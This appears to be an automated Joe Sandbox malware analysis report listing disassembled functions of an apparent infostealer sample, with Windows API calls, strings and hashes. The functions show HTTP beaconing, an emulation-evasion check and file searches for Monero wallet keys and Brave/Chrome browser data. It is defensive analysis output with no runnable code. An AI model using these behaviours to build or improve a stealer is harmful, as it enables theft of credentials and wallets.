                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 79108e3a01a90adc9ee515539b80769a46a43beaa6696dc95d1982c371eef89f
                  • Instruction ID: 66219d99fa5fd395c3744a9c0184831ca4094d199dfeadd3f1489ca08c8386da
                  • Opcode Fuzzy Hash: 79108e3a01a90adc9ee515539b80769a46a43beaa6696dc95d1982c371eef89f
                  • Instruction Fuzzy Hash: 0D216FB1D00208ABDF10DFA4E849ADE7B74FF45320F108625F915A72C0EB706A09DF81
                  Function 00C151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C06280: InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1
                    • Part of subcall function 00C06280: StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303
                    • Part of subcall function 00C06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335
                    • Part of subcall function 00C06280: HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385
                    • Part of subcall function 00C06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C063BF
                    • Part of subcall function 00C06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: b1d48e18fc5bbb8274be8fab826696d3815c7c666475b80bf1316ac3d69f8c7f
                  • Instruction ID: fa8a550233c858fb586b080b201d83cdc7857ba6f350de335c2b6ddca5ddaa22
                  • Opcode Fuzzy Hash: b1d48e18fc5bbb8274be8fab826696d3815c7c666475b80bf1316ac3d69f8c7f
                  • Instruction Fuzzy Hash: 01115230901008ABDB14FF71DD52AED7338AF51310F444168F81A5B5D2EF30AB86FA91
                  Function 00C01110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C0112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C01132
                  • ExitProcess.KERNEL32 ref: 00C01143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 6d762e4e89647e9b9cc72f60756b5709b6178da315c3b89507f85447e7e6b6f7
                  • Instruction ID: 4e74d46c1d692d84abbf7300897ab83a099609c875bfd1a5043aabf35835db79
                  • Opcode Fuzzy Hash: 6d762e4e89647e9b9cc72f60756b5709b6178da315c3b89507f85447e7e6b6f7
                  • Instruction Fuzzy Hash: 82E08674985308FFE7146FA19C0EB0D76B8EB05B15F140055F709761C0C6B426059699
                  Function 00C010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C010B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C010F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 6d607c78b844274163314591470fb35e184b5ca63ab366c415cbdfd2d31e99f2
                  • Instruction ID: 70f4a4eaf1a3f947b145da0c7786f4ba155e4bb464f899cdc0b19607059ac626
                  • Opcode Fuzzy Hash: 6d607c78b844274163314591470fb35e184b5ca63ab366c415cbdfd2d31e99f2
                  • Instruction Fuzzy Hash: A7F0E271681218BBE7149BA4AC49FAAB7E8E706B25F300458F944E3280D5719F44DAA0
                  Function 00C01190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17910
                    • Part of subcall function 00C178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C17917
                    • Part of subcall function 00C178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F
                    • Part of subcall function 00C17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C011B7), ref: 00C17880
                    • Part of subcall function 00C17850: RtlAllocateHeap.NTDLL(00000000), ref: 00C17887
                    • Part of subcall function 00C17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F
                  • ExitProcess.KERNEL32 ref: 00C011C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 89ba8a9b7b40e23688b957b523034400e4f063add174b245bb91cf8e49cf1016
                  • Instruction ID: 417045e782272bbe22e078344cb62ed5c6878965b8d4dca0ba058805fb28bab8
                  • Opcode Fuzzy Hash: 89ba8a9b7b40e23688b957b523034400e4f063add174b245bb91cf8e49cf1016
                  • Instruction Fuzzy Hash: C5E0CD7594430157DA0033B16C0AB5A325C5B02345F0C0434FF08F2142FD14F545F565

                  Non-executed Functions

                  Function 00C138B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00C138CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C138E3
                  • lstrcat.KERNEL32(?,?), ref: 00C13935
                  • StrCmpCA.SHLWAPI(?,00C20F70), ref: 00C13947
                  • StrCmpCA.SHLWAPI(?,00C20F74), ref: 00C1395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C13C67
                  • FindClose.KERNEL32(000000FF), ref: 00C13C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 4b9c5a4ababb79bc54bfa7ec36c18600ddc2a04ed980ba183f78f569d360ee15
                  • Instruction ID: 70ec680fb1b9e4c7b36abaaf5ff987e53bd3f029da81ff9d5b6917a932481af2
                  • Opcode Fuzzy Hash: 4b9c5a4ababb79bc54bfa7ec36c18600ddc2a04ed980ba183f78f569d360ee15
                  • Instruction Fuzzy Hash: CEA194B59402189FDB34DFA4DC85FEE7378BB49300F084598B50DA6181EB709B89DF52
                  Function 00C0BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00C20B32,00C20B2B,00000000,?,?,?,00C213F4,00C20B2A), ref: 00C0BEF5
                  • StrCmpCA.SHLWAPI(?,00C213F8), ref: 00C0BF4D
                  • StrCmpCA.SHLWAPI(?,00C213FC), ref: 00C0BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0C7BF
                  • FindClose.KERNEL32(000000FF), ref: 00C0C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 56c26be0c778271128685b3ff0d009298c0522914b8269a15dd49ad758818d4f
                  • Instruction ID: 993d9df55bd31fcf6ff91a55fdf183f9fc0e0267f99ce86008f2d70564a370f8
                  • Opcode Fuzzy Hash: 56c26be0c778271128685b3ff0d009298c0522914b8269a15dd49ad758818d4f
                  • Instruction Fuzzy Hash: 3A4295729111049BDB14FB70DD96EED733CAF95310F404568F90AA61C1EF30AB8AEB92
                  Function 00C14910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00C1492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C14943
                  • StrCmpCA.SHLWAPI(?,00C20FDC), ref: 00C14971
                  • StrCmpCA.SHLWAPI(?,00C20FE0), ref: 00C14987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C14B7D
                  • FindClose.KERNEL32(000000FF), ref: 00C14B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 292ddaffc37aa4673ff3af3a14ce1f96324f0bab5383b9d38de6111cdefc68e4
                  • Instruction ID: 92ef6ea0e77568f3f7e4f89e048e783de026c7f2f2783e3a4ab14d97e0afd2e1
                  • Opcode Fuzzy Hash: 292ddaffc37aa4673ff3af3a14ce1f96324f0bab5383b9d38de6111cdefc68e4
                  • Instruction Fuzzy Hash: 936176B5940218AFCB24EFE1DC49EEA737CFB49700F044599B509A6181EB309B89DF91
                  Function 00C14570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C14580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C14587
                  • wsprintfA.USER32 ref: 00C145A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C145BD
                  • StrCmpCA.SHLWAPI(?,00C20FC4), ref: 00C145EB
                  • StrCmpCA.SHLWAPI(?,00C20FC8), ref: 00C14601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C1468B
                  • FindClose.KERNEL32(000000FF), ref: 00C146A0
                  • lstrcat.KERNEL32(?,0179ED58), ref: 00C146C5
                  • lstrcat.KERNEL32(?,0179DC80), ref: 00C146D8
                  • lstrlen.KERNEL32(?), ref: 00C146E5
                  • lstrlen.KERNEL32(?), ref: 00C146F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 843faa6c07443c15d4a38b55cdabe427d7705efe2e3781a555401f1301fb148d
                  • Instruction ID: 158d826994c45bbd299e8ddc0fa1ab536d9a1e2d17d516e02b0f74790b98efd7
                  • Opcode Fuzzy Hash: 843faa6c07443c15d4a38b55cdabe427d7705efe2e3781a555401f1301fb148d
                  • Instruction Fuzzy Hash: 0E5187B69402189FC724EBB0DC89FED737CAB59310F044599F609A6090EB749BC9DF91
                  Function 00C13EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00C13EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C13EDA
                  • StrCmpCA.SHLWAPI(?,00C20FAC), ref: 00C13F08
                  • StrCmpCA.SHLWAPI(?,00C20FB0), ref: 00C13F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C1406C
                  • FindClose.KERNEL32(000000FF), ref: 00C14081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 00ea58cd7a0f04609417f5d0238fa878061f1cbc514ccd5c960b768247409be2
                  • Instruction ID: c97d1c705f5c3692caab5fbc978fcce6a0592658b69edb0628610b54ff09b98d
                  • Opcode Fuzzy Hash: 00ea58cd7a0f04609417f5d0238fa878061f1cbc514ccd5c960b768247409be2
                  • Instruction Fuzzy Hash: 1B5199B6900218AFCB24EBB1DC85EFA737CFB49300F044599B61996080DB75DB8ADF91
                  Function 00C0ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00C0ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C0ED55
                  • StrCmpCA.SHLWAPI(?,00C21538), ref: 00C0EDAB
                  • StrCmpCA.SHLWAPI(?,00C2153C), ref: 00C0EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0F2AE
                  • FindClose.KERNEL32(000000FF), ref: 00C0F2C3
                  Strings
                  Memory Dump Source
